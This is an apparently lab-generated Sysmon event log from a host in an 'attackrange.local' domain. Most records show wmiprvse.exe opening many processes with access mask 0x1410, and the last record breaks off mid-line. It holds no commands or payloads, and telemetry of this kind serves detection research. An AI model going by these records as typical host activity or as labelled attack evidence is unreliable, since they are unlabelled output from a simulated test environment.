10341000x80000000000000002204414Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.118{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B82D-00000000AD01}5444C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204413Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.118{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B72D-00000000AD01}5372c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204412Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.118{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B62D-00000000AD01}6644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204411Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.118{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F0-603F-B52D-00000000AD01}4336C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002204410Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.118{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=972FAE00BA396AE153FAAA318A7BD592,SHA256=211AEA91F398216AE78E4842A7F7886E30FFA372B9A6A2F6CEFBE1549E07A07C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204409Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.118{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F0-603F-B42D-00000000AD01}2724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204408Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-ADE1-603E-4F0A-00000000AD01}7004C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204407Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-9B0C-603E-D607-00000000AD01}6796C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204406Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204405Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204404Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204403Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F4-603E-8607-00000000AD01}4560C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204402Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F4-603E-8307-00000000AD01}1624C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204401Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F2-603E-7D07-00000000AD01}636C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204400Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99F1-603E-7A07-00000000AD01}2736C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204399Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84BD-603E-DF00-00000000AD01}4964C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204398Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84AF-603E-DC00-00000000AD01}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204397Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204396Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84A3-603E-A900-00000000AD01}4912C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204395Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204394Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 